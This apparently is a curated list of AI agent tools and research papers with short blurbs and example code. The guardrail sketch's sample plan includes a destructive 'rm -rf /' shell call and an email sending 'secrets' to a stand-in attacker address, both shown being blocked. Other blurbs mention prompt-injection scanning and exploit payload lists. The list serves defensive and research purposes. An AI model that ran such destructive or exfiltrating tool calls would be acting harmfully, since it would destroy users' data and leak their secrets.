Tools
Research papers, repositories, and articles about tools
SpatialClaw: Rethinking Action Interface for Agentic Spatial Reasoning
The authors build SpatialClaw, a code-driven agent that uses a stateful Python kernel plus vision tools to solve 3D and 4D spatial puzzles. It beats prior spatial agents across 20 benchmarks and six vision-language backbones, showing that the action interface design can unlock much stronger spatial reasoning.
DeusData/codebase-memory-mcp
High-performance code intelligence server that indexes repos into a persistent knowledge graph. Lets AI tools query big codebases with fewer tokens and sub-millisecond latency. If you build code agents, this is production-grade infrastructure to borrow. ([github.com](https://github.com/trending?since=daily))
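As a rough illustration of what "indexing a repo into a knowledge graph" can mean, here is a minimal sketch that uses Python's standard `ast` module to record which functions a module defines and which functions call which. The names `index_source` and `callers_of`, the edge labels, and the in-memory dictionary are all assumptions made for this example; they are not the project's API or storage format, and nothing here is persistent or optimized.

```python
import ast
from collections import defaultdict

def index_source(module_name, source, graph=None):
    """Add 'defines' and 'calls' edges for one module to an in-memory graph.

    Hypothetical helper: the graph maps (node, relation) -> set of targets.
    """
    graph = graph if graph is not None else defaultdict(set)
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            graph[(module_name, "defines")].add(node.name)
            # Record direct calls to plain names; method calls are ignored here.
            for inner in ast.walk(node):
                if isinstance(inner, ast.Call) and isinstance(inner.func, ast.Name):
                    graph[(node.name, "calls")].add(inner.func.id)
    return graph

def callers_of(graph, target):
    """Answer 'who calls target?' from the graph without rereading any source."""
    return sorted(
        src for (src, rel), dsts in graph.items()
        if rel == "calls" and target in dsts
    )

SOURCE = '''
def load(path):
    return open(path).read()

def parse(text):
    return text.split()

def main(path):
    return parse(load(path))
'''

graph = index_source("app", SOURCE)
print(callers_of(graph, "parse"))
```

The point of the sketch is the query pattern: once the edges exist, an agent can ask a narrow question such as "who calls `parse`?" and receive a short answer instead of loading whole files into its context.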
NVIDIA/SkillSpector
SkillSpector scans AI agent skills for security problems, prompt injection vectors, and risky patterns. It aims to become the "lint" tool for agent skill stores as organizations start sharing and reusing skills at scale.
CAR-bench: Evaluating the Consistency and Limit-Awareness of LLM Agents under Real-World Uncertainty
CAR-bench builds an in-car assistant world with messy, ambiguous user requests and many tools. It measures not only whether agents finish tasks, but also whether they recognize when they are out of their depth.
ToolSafe: Enhancing Tool Invocation Safety of LLM-based agents via Proactive Step-level Guardrail and Feedback
ToolSafe builds a guardrail model that watches each tool call an agent plans to make and flags dangerous ones before they run. In tool-using agents under prompt-injection attacks, it slashes harmful calls while slightly improving task success.
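The step-level idea can be sketched as a loop that checks every planned tool call before it executes and returns feedback instead of running a blocked call. In this sketch the learned guardrail model is replaced by a few hand-written rules, and `ToolCall`, `guardrail`, `run_with_guardrail`, the tool names, and the allowed email domain are all hypothetical; none of it is taken from the paper.

```python
from dataclasses import dataclass

@dataclass
class ToolCall:
    tool: str
    args: dict

def guardrail(call):
    """Return (allowed, feedback). Rule-based stand-in for a learned guardrail model."""
    if call.tool == "shell" and "rm -rf" in call.args.get("cmd", ""):
        return False, "destructive shell command"
    if call.tool == "send_email" and not call.args.get("to", "").endswith("@example.com"):
        return False, "recipient outside the allowed domain"
    return True, "ok"

def run_with_guardrail(plan, tools):
    """Check each planned call before executing it; blocked calls never run."""
    transcript = []
    for call in plan:
        allowed, feedback = guardrail(call)
        if allowed:
            result = tools[call.tool](**call.args)
            transcript.append(("ran", call.tool, result))
        else:
            # The feedback string is what an agent would see in place of a tool result.
            transcript.append(("blocked", call.tool, feedback))
    return transcript

# Toy tools that only return strings, so the example has no side effects.
tools = {
    "shell": lambda cmd: f"executed {cmd}",
    "send_email": lambda to, body: f"sent to {to}",
}

plan = [
    ToolCall("shell", {"cmd": "ls"}),
    ToolCall("shell", {"cmd": "rm -rf /"}),
    ToolCall("send_email", {"to": "attacker@evil.test", "body": "secrets"}),
]

transcript = run_with_guardrail(plan, tools)
for entry in transcript:
    print(entry)
```

Checking per call rather than per task means a single injected instruction can be stopped without aborting the rest of the plan, which is one plausible way that blocking harmful calls and finishing the task can coexist.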
usestrix/strix
An "AI hacker" that scans your app for security issues using agents. Shows where security and AI Ops are colliding. Worth studying if you're adding automated testing around LLM apps. ([github.com](https://github.com/trending?since=daily))
microsoft/markitdown
markitdown converts many document formats into clean Markdown, which LLMs handle more reliably. It’s a practical bridge between messy office files and the text-first world most AI models live in.
MASFactory: A Graph-centric Framework for Orchestrating LLM-Based Multi-Agent Systems with Vibe Graphing
MASFactory is a framework that treats an agent swarm as a graph you can design, visualize, and debug. It makes building a multi-agent system feel more like designing a workflow than wiring together ad hoc hacks.
MatchTIR: Fine-Grained Supervision for Tool-Integrated Reasoning via Bipartite Matching
MatchTIR stops treating every step in a tool-using trajectory equally. It uses bipartite matching to align predicted tool traces with gold traces, then assigns a reward to each step, making small models competitive with larger ones on long tool-use tasks.
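To make the matching step concrete, here is a minimal sketch that pairs predicted tool calls with gold tool calls one-to-one so that total similarity is maximized, then gives each predicted step the score of its pair. The similarity function, the dictionary format for tool calls, and the brute-force search over assignments are assumptions chosen for readability; the paper's actual reward definition and matching algorithm may differ, and a real implementation would likely use a polynomial-time assignment solver.

```python
from itertools import permutations

def step_similarity(pred, gold):
    """Hypothetical score in [0, 1]: 0 if tools differ, else 0.5 plus argument overlap."""
    if pred["tool"] != gold["tool"]:
        return 0.0
    gold_args = gold["args"]
    if not gold_args:
        return 1.0
    hits = sum(1 for k, v in gold_args.items() if pred["args"].get(k) == v)
    return 0.5 + 0.5 * hits / len(gold_args)

def match_rewards(predicted, gold):
    """Return one reward per predicted step from a maximum-weight one-to-one matching.

    Brute force over assignments, so only suitable for short traces.
    """
    size = max(len(predicted), len(gold))

    def score(i, j):
        # Columns beyond len(gold) are dummy slots: the step stays unmatched.
        return step_similarity(predicted[i], gold[j]) if j < len(gold) else 0.0

    best_total, best_rewards = -1.0, []
    for assignment in permutations(range(size), len(predicted)):
        rewards = [score(i, j) for i, j in enumerate(assignment)]
        total = sum(rewards)
        if total > best_total:
            best_total, best_rewards = total, rewards
    return best_rewards

predicted = [
    {"tool": "search", "args": {"q": "weather paris"}},
    {"tool": "calc", "args": {"expr": "2+2"}},
    {"tool": "search", "args": {"q": "weather rome"}},
]
gold = [
    {"tool": "search", "args": {"q": "weather rome"}},
    {"tool": "calc", "args": {"expr": "2+2"}},
]

print(match_rewards(predicted, gold))
```

In this toy trace the first predicted search has the wrong query and ends up unmatched, because the third step is a better partner for the only gold search. A trajectory-level reward would have scored all three steps identically.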
browser-use/video-use
Lets coding agents edit videos programmatically. Bridges dev tooling and media pipelines. If you're eyeing agentic video editing or auto-content workflows, this is a strong starting point. ([github.com](https://github.com/trending?since=daily))
AdaTooler-V: Adaptive Tool-Use for Images and Videos
AdaTooler-V teaches vision-language models when to call external tools, not just how. That cuts unnecessary tool calls, reducing costs while often boosting accuracy on vision tasks.
swisskyrepo/PayloadsAllTheThings
A giant, curated list of exploit payloads and bypass tricks for web security and CTFs. It’s becoming the default knowledge base that security-focused AI tools plug into. ([github.com](https://github.com/trending))
nesquena/hermes-webui
A web and mobile-friendly UI for the Hermes agent system. It lets non-engineers spin up task-running agents with a few clicks. If you’re experimenting with agents for teams, this is a fast way to test workflows without writing your own front-end.
dmtrKovalenko/fff.nvim
Fast file-search and context toolkit designed for AI agents and Neovim. Helps agents find the right code spans instead of grepping everything.
Tool-Augmented Spatiotemporal Reasoning for Streamlining Video Question Answering Task
The authors augment multimodal LLMs with a "Video Toolkit" and a STAR (Spatiotemporal Reasoning) framework that orchestrates calls to temporal and spatial tools for video question answering. Instead of treating the video as a black-box embedding, the model actively localizes key regions over time using tools, yielding sizable gains on VideoMME and LongVideoBench when wrapped around GPT-4o.